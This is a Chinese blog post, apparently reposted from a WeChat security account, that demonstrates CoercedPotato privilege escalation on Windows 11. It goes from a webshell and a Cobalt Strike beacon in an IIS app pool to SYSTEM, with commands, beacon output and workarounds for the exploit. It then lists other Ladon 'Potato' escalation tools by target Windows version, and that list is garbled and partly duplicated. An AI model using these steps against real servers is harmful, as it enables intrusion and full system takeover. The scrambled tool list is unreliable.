CoercedPotato 服务提权至system
影响版本
Win10
Win11
Win2016
Win2019
Win2022
测试环境
Win11 22H2
Microsoft Windows [Version 10.0.22621.1194]
权限 iis apppooldefaultapppool
Win11 开启IIS服务 放个WebShell 通过WebShell上线CS
查看权限
beacon> shell whoami
[ ] Tasked beacon to run: whoami
[37 bytes ] host called home, sent:
[ ] received output:
iis apppooldefaultapppool
系统版本
beacon> shell ver
[*] Tasked beacon to run: ver
[+] host called home, sent: 34 bytes
[+] received output:
Microsoft Windows [Version 10.0.22621.1194]
提权命令
shell CoercedPotato.exe -c whoami
未开共享提权失败
exp有点问题,不退出,第2次执行失败,解决方案,改EXP,当然为了不在它身上浪费时间,也可以直接通过结束进程来解决。
再次提权,成功提至SYSTEM权限,使用Ladon GetPipe可查看到EXP开启的对应pipe管道有两个。
shell CoercedPotato.exe -c whoami
Ladon GetPipe
CS插件版失败,Ladon GetPipe查看只起了一个spoolss管道
Ladon系列Potato提权
除了本文的Potato可提权至system,Ladon内置系列Potato如下
参考教程: Ladon11.7更新3个横向移动5个Potato提权
[ ]BadPotato 本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题
[ ]EfsPotato 本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题
[ ]GodPotato 本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题
[ ]SweetPotato 本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题
[ ]McpPotato 本地提权 支持Base64参数 解决Cobalt Strike或LadonShell下双引号等问题
[4.0 Win11/2022提权至System 其它系统自测 ]McpPotato .NET>=
[18秒,无需taskkill自身,免得IIS下提权把IIS进程干了 解决退出问题 ]SweetPotato 超时
[152KB 放过时、使用不多、易被杀的提权EXP在Lpe2 如bypassUAC、打印机提权等 PrintNightmare SpoolFool PrintNotifyPotato ms16135 ]LadonLpe2
LadonLpe 257KB GodPotato
[-2022提权 (测试2012 R2 iis apppooldefaultapppool权限 失败)WIN11网络服务成功 ]GodPotato Win8-Win11/Win2012
[4.0 ]badpotato win8以上才可用,相当于.net
程序集: install_clr、uninstall_clr、clr_exec、clr_efspotato、clr_badpotato
程序集: install_clr、uninstall_clr、clr_exec、clr_efspotato、clr_badpotato
功能: info、xp_cmdshell、installclr、clr_exec、clr_efspotato、cls_badpotato
功能: info、xp_cmdshell、installclr、clr_exec、clr_efspotato、cls_badpotato
[-11 Win2012-Win2022 移除 ]PrintNotifyPotato 提权Win10
[-2019提权(服务用户权限提到system) ]EfsPotato Win7
[-2019提权(服务用户权限提到system) ] SweetPotato Win7
[-2019) ] BadPotato PrintSpoofer/PipePotato提权(Win8-Win10/Win2012
[-2019) ] BadPotato PrintSpoofer/PipePotato提权(Win8-Win10/Win2012
原文始发于微信公众号(K8实验室):CoercedPotato提权Win10-Win2022
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论